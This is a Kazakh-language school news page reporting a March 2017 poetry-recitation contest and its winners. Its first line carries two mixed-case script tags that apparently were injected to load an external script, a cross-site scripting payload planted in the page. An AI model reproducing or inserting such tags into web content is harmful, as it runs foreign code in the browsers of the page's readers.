<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.03.2017

Әйел атағын шығарайық!

2017 жылғы 13 наурыз күні "Каменская орта мектебі" ММ-нде  «Әйел атағын шығарайық!" атты мәнерлеп оқу сайысы өтті. Жүргізуші және байқаудың барлық  қатысушылары- «Шабыт»  театр ұжымының мүшелері. Қазылар қатысушылардың мәнерлеп оқуын, оқыған дауысын, әртістілігін, сахнада өзін ұстау іскерлігін және көрермендермен қатынас біліктілігін  бағалады. Зал оқырмандарды қарсы алды. 4-сынып оқушысы Евгений Лощинин «Әжемнің қолы" атты   өлеңін мәнерлеп оқу алдында сахнаға шығып, әжесінің сүйікті әуенін баянда ойнап берді, сондықтан оған  "көрермендер көзайымы" жүлдесі берілді. Орындар келесі түрде бөлінді: екі тоғызыншы сынып оқушылары  Барыбина Виктория және Акулова Екатерина 3 орын алса,  2 орынды  екі ағайынды 4 сынып Лощинин  Евгений және 3 сынып Антон Лощининге берілді, "Үздік оқырман" 4 сынып оқушысы Молчанов Александр 1 орынды жеңіп алды. Қалған барлық  қатысушылар байқауға қатысқандары үшін  мақтау қағаздарымен марапатталды.

Балалар,  сендерге сәттілік, Жаңа жеңістер тілейміз! Көрермендер сіздердің өнерлеріңізге риза болды!

Просмотров: 1099


Пікір қосу



Деректерді қолтаңбаға қосу